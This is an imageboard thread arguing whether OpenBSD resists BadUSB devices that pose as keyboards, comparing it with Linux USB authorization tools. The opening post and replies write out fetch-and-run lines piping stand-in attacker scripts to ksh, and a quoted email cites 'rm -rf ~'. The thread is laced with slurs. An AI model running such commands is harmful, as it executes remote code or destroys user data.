Can openBsd become secure?

>attach your usb pendrive
>It registers self as HID
>curl lol.lamao/own.sh | ksh
*Ack*

10 years behind linux

POSIWID: The Purpose Of A System Is What It Does Shirt $21.68

UFOs Are A Psyop Shirt $21.68

POSIWID: The Purpose Of A System Is What It Does Shirt $21.68

  1. 1 month ago
    Anonymous

    Seems it's over.

  2. 1 month ago
    Anonymous

    Raadt sisters, did we got too wienery?

    • 1 month ago
      Anonymous

      Pretty sad they aren't fixing it
      Can IQfy push them into being serious about security? Wasn't that their goal anyway?

      • 1 month ago
        Anonymous

        >failing at the one thing you dedicated your entire operating system to

  3. 1 month ago
    Anonymous

    That fish kinda looks like covid-19

  4. 1 month ago
    Anonymous

    good thing there arent thousands of other mischievious ways to frick up a system when you have physical access to it

    • 1 month ago
      Anonymous

      >User inserting an USB pendrive
      Is identical to
      >Giving someone full access to your hardware and leaving into cuckshed.
      Lol.

      • 1 month ago
        Anonymous

        >Just never attach USB into your openbsd, bro
        >There is NO safe way to do it, no matter how much you try (hint: attach it to Linux instead)

        >attach any HID device
        >it can do the same exact thing on all operating systems
        BSDbros... we lost...

        • 1 month ago
          Anonymous

          No, on Linux you disable USB authorize, then check is the device trying to connect as keyboard or as disk, if it's what you want then you authorize it (if it changes something in middle then it's a new interface with new USB device and new separate authorized=0).

          This tech makes bsds angry and confused

          • 1 month ago
            Anonymous

            And even have programs that.automate that, ev accept new disks and nics but not hid keyboards mouses.

          • 1 month ago
            Anonymous

            you can do that on bsd too
            point is it isn't the default anywhere, and shouldn't be because it is a massive QOL loss for minimal security benefits.

          • 1 month ago
            Anonymous

            >you can do that on bsd too
            Orly?
            Show how - all searching for it returns nothing.

            >Not needed
            How dumb are you? Inserting any pendrive, or DVD USB, nic on USB, camera on USB, can pwn your box (assuming you have or will have open console, which is common esp for bsd, or have a shortcut to open one)

          • 1 month ago
            Anonymous

            It is a common requirement for classified systems.

          • 1 month ago
            Anonymous

            >if an attacker has physical access to your computer it's over
            It's not an attacker (standing alone over your PC, with a screwdriver and soldering iron) you dofus.
            It's you, willingly inserting an USB CD-ROM reader into your pc, and that device suddenly turns out to have hacked firmware and instead is a remote keyboard.

          • 1 month ago
            Anonymous

            I think you replied to the wrong guy. I'd also add that it's also about user error such as plugging in the wrong usb on accident. Just having access to the exterior of a computer is not same as the physical access that the experts mean. I wish they worded things better so idiots like the ones in this thread would stop parroting wrong advice.

      • 1 month ago
        Anonymous

        If I already have physical access to an unlocked computer I can just quickly enter "lol.lamao/own.sh | ksh" myself instead of bothering with some USB device.

        • 1 month ago
          Anonymous

          you have no access
          think of the usb device as maybe some conference swag or chinkshit

        • 1 month ago
          Anonymous

          >If I already have physical access to an unlocked computer I can just quickly enter
          what a moronic homosexual mongrel!
          >letting a stranger walk into your home, pick up your computer, and letting him type commands in terminal
          >is exactly as insecure, unusual and alarming as:
          >plugging an USB dvd reader into your computers
          >it's the same thing!
          fricking L A M A O

          how are people so moronic? is he coping? is he not getting it?

      • 1 month ago
        Anonymous

        >Illustrating the insecurity of *BSD this hard

    • 1 month ago
      Anonymous

      >Just never attach USB into your openbsd, bro
      >There is NO safe way to do it, no matter how much you try (hint: attach it to Linux instead)

  5. 1 month ago
    Anonymous

    cuck license

    • 1 month ago
      Anonymous

      GPL failed. Get used to it.

  6. 1 month ago
    Anonymous

    if thats a problem then just turn off the usb ports

  7. 1 month ago
    Anonymous

    >>curl lol.lamao/own.sh | ksh
    your link is not working

    • 1 month ago
      Anonymous

      Sorry it’s
      www.yougotpw.ned/attack.sh

  8. 1 month ago
    Anonymous

    if an attacker has physical access to your computer it's over anyways
    the mitigation for that isn't at the OS level, it's with a gun

    • 1 month ago
      Anonymous

      Read

      >if an attacker has physical access to your computer it's over
      It's not an attacker (standing alone over your PC, with a screwdriver and soldering iron) you dofus.
      It's you, willingly inserting an USB CD-ROM reader into your pc, and that device suddenly turns out to have hacked firmware and instead is a remote keyboard.

      Noob

      • 1 month ago
        Anonymous

        having access to ports and the keyboard doesn't mean shit
        what's meant by physical access is the access to internal components and the connections between them

        • 1 month ago
          Anonymous

          Yes

  9. 1 month ago
    Anonymous

    >Uhhhh why does my laptop break when I hit the mainboard with an axe
    Only use peripherals you trust, moron. That's security 101

    • 1 month ago
      Anonymous

      You are literally a moronic imbecile.
      Attach USB device that you just bought: Linux - ok; openbsd - get hacked.

      • 1 month ago
        Anonymous

        > OpenBsd can't be used with any connected devices (except the ones you build yourself)
        Useless

        Only buy from vendors you trust. Why do you think every single company bans usb sticks?

        • 1 month ago
          Anonymous

          companies definitely should ban untrusted usb devices
          it's sad that most don't
          even windows can don this btw
          openbsd mogged by microsoft lmao

          • 1 month ago
            Anonymous

            linux and windows have proven to be insecure

        • 1 month ago
          Anonymous

          >Only buy from vendors you trust.
          No such need on Linux.

          linux and windows have proven to be insecure

          >linux and windows have proven to be insecure
          no.
          https://usbguard.github.io/

          The USBGuard software framework helps to protect your computer against rogue USB devices (a.k.a. BadUSB) by implementing basic whitelisting and blacklisting capabilities based on device attributes.

          • 1 month ago
            Anonymous

            yeah linux and windows have proven to be insecure

          • 1 month ago
            Anonymous

            >yeah linux and windows have proven to be insecure
            in what?
            for badUSB, Linux with usbguard is secure, while OpenBSD fails

          • 1 month ago
            Anonymous

            Some OpenBSD user made a simple script that protects you against it ttps://github.com/e-zk/hidlock

          • 1 month ago
            Anonymous

            >just locks your X session when new kb appears
            what an useless hack
            it still lets all usb devices connect so it doesn't really protect against much
            you want to be able to inspect the devices and make policies for which to allow

          • 1 month ago
            Anonymous

            >Some FRICKING moron made a simple script that protects you against it https://github.com/e-zk/hidlock
            it doesn't protect you.

            >OH BRO I WILL SHUT DOWN THE COMPUTER 1 second after you get rootkited in 0.002 seconds, COOL BRO? 1.. or 3 seconds, or N seconds, depending what computer is doing. depend on random timing for your security bro!
            in security-focused distro! lol.

            only solution is to prevent attaching devices (all, not just hid) before they are authorized. Linux figured it out around 10 years ago.

          • 1 month ago
            Anonymous

            USB HID polling is slow as shit, xlock will be faster.

            But nah, let's overengineer everything with a million dbus services and policies written in JavaScript like USBGuard does.

          • 1 month ago
            Anonymous

            >hinge your security on a race condition
            LOL!!!
            brain rot.

            Can someone explain to me what OP is on about?

            >Can someone explain to me what OP is on about?
            https://en.wikipedia.org/wiki/BadUSB

          • 1 month ago
            Anonymous

            >lets remain insecure
            >asking to have /dev/.../authorized is waaaay too much bro
            >better allow your usb camera to become usb keyboard controlled by attacker, that is far safer
            beyond delusional

    • 1 month ago
      Anonymous

      > OpenBsd can't be used with any connected devices (except the ones you build yourself)
      Useless

  10. 1 month ago
    Anonymous

    >on usb detect
    >10 second delay before registration
    >ability to perform attack disappears in 104% of cases
    >convenience cucks will never sacrifice

  11. 1 month ago
    Anonymous

    bsdtroony cope thread

  12. 1 month ago
    Anonymous

    OpenBSD comes with neither curl nor wget preinstalled.

  13. 1 month ago
    Anonymous

    Can someone explain to me what OP is on about?

    • 1 month ago
      Anonymous

      no fricking idea. he just made some shit up and now moronic lintroons are all excited
      the absolute state of this board

    • 1 month ago
      Anonymous

      openBSD has fallen, billions must uninstall

      • 1 month ago
        Anonymous

        >openBSD has fallen
        if any of there compuers would make the mistake of using OpenBSD they would be successfully hacked:
        targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]

        • 1 month ago
          Anonymous
          • 1 month ago
            Anonymous

            It's over.

            In hindsight, had we a chance to motivate OpenBSD (and *BSD) to fix their shit?

  14. 1 month ago
    Anonymous

    Openbsd is more secure than any of your toy distros.

    • 1 month ago
      Anonymous

      >Openbsd is more secure than
      then why it would be hacked in this scenario while linux (with echo 0 > ....default_authorize at boot) would be 100% safe?

      • 1 month ago
        Anonymous

        prove it would be hacked

  15. 1 month ago
    Anonymous

    If somone can touch your computer to plug in a BadUSB they can reboot into the distro. of their choice (which is Kali Linux for sophisticated gentlemen like me) and proceed to do what they want.

    • 1 month ago
      Anonymous

      >If somone can touch your computer to plug in a BadUSB they can reboot into the distro.
      how moronic are you to not understand this?
      it's not "someone" touching your computer, it's YOU plugging in the usb pendrive you got from work.
      (turns out it's not just pendrive).

      prove it would be hacked

      >prove it would be hacked
      it's already a famouse attack in the wild, read above, tard

      >openBSD has fallen
      if any of there compuers would make the mistake of using OpenBSD they would be successfully hacked:
      targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]

      >targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]

      • 1 month ago
        Anonymous

        Why would I plug an untrusted random USB drive into my pc?

        • 1 month ago
          Anonymous

          >Why would I plug an untrusted random USB drive into my pc?
          there is no such thing as "trusted usb".
          maybe if you build one from semiconductors... do you?

          • 1 month ago
            Anonymous

            Did you make your own CPU too?
            How can you trust your USB protection software will work on untrusted silicon?

          • 1 month ago
            Anonymous

            >Did you make your own CPU too?
            yes. next question please?

            >well CPU might be backdoored, better give up on any security anyway
            70 IQ

          • 1 month ago
            Anonymous

            just dont leave a shell logged in as a superuser open, idgi. you're just typing shit into a login prompt on my obsd server if you try this lol. if you can already log in as a user with important access rights you could've just opened a remote shell anyways and saved yourself the trouble, that's true of any system. great security flaw op, very useful.

            vulnsplaining.

            also: openbsd monitoring central: 4 cameras on usb.
            can't never open console on that thing.
            how moronic.

            how about instead just fricking adding AUTHORIZED attribute in /proc like Linux.

  16. 1 month ago
    Anonymous

    >Only two remote holes in the default install, in a heck of a long time!
    note where it says remote moron

  17. 1 month ago
    Anonymous

    the only operating system that is immune to this is one that disallows all USB; or at least has a hwid whitelist. I use badUSBs all the time on everything

  18. 1 month ago
    Anonymous

    [...]

    the only operating system that is immune to this is one that disallows all USB; or at least has a hwid whitelist. I use badUSBs all the time on everything

    https://zakaria.org/posts/2021-01-11-usbkiller.html

  19. 1 month ago
    Anonymous

    [...]

    ://marc.info/?l=openbsd-misc&m=140692695632561
    >deboonked
    >/thread

    the link:
    >2. They have created a rogue keyboard device which will type naughty
    commands. In theory, the same keyboard could type "rm -rf ~" into an
    xterm. This is a tiny bit more challenging since it probably depends
    on your desktop environment and window manager, but presumably your
    attacker will know all that.
    >So yeah, vulnerable.
    lol.
    even your link says you are vulnerable

  20. 1 month ago
    Anonymous

    just dont leave a shell logged in as a superuser open, idgi. you're just typing shit into a login prompt on my obsd server if you try this lol. if you can already log in as a user with important access rights you could've just opened a remote shell anyways and saved yourself the trouble, that's true of any system. great security flaw op, very useful.

  21. 1 month ago
    Anonymous

    this schizo ass homie isn't even writing coherent sentences at this point

    • 1 month ago
      Anonymous

      >I am too dumb to read simple english
      >I will ignore the fact this attack is popular in the wild as linked above twice
      please kys

Your email address will not be published. Required fields are marked *